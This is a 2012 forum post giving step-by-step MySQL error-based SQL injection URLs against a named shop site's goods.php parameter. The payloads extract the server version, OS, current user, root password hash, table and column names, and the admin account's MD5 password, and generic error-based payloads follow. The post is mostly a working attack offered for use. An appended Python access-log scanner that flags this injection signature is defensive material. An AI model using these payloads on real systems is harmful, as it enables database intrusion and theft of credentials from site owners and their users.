Details of blind injection

OP, posted 2012-9-5 14:59:30
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The user_name column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The password column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Get the admin password (md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
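An added example, not part of the original post: every payload above relies on the same MySQL duplicate-entry trick (count(*) together with floor(rand()*2) and group by in one parameter value), so a defender can flag it in web server access logs. The Python below decodes each query parameter, including double-encoded ones, and walks combined-format log lines; the host, IP addresses and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# The MySQL duplicate-entry trick used throughout the post needs all three
# fragments (count(*), floor(rand()*2), group by) in one parameter value.
_FRAGMENTS = (
    re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    re.compile(r"group\s+by", re.I),
)
# Apache/nginx combined log format; fields after the status code are ignored.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def flag_request(url):
    """Return (param, decoded value) for the first query parameter carrying the
    signature, else None; the extra unquote_plus also catches %2520 double encoding."""
    for name, values in parse_qs(urlparse(url).query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote_plus(value)
            if all(p.search(decoded) for p in _FRAGMENTS):
                return name, decoded
    return None

def scan_access_log(lines):
    """Return [(ip, timestamp, param, status)] for each flagged log line."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        hit = flag_request("http://localhost" + m["path"])  # host is irrelevant
        if hit:
            hits.append((m["ip"], m["ts"], hit[0], int(m["status"])))
    return hits

# Constructed sample lines: a normal request, the post's @@version probe against
# an example host (500 = the raised MySQL error), and a benign "group by" search.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Sep/2012:14:59:41 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E'
    '(select%20count(*),concat((select%20@@version),0x3a,floor(rand()*2))%20x%20from%20'
    '(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 812',
    '198.51.100.4 - - [05/Sep/2012:15:02:10 +0800] "GET /search.php?q=group%20by%20category HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, ts, param, status in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip}: error-based SQLi signature in '{param}' (HTTP {status})")
```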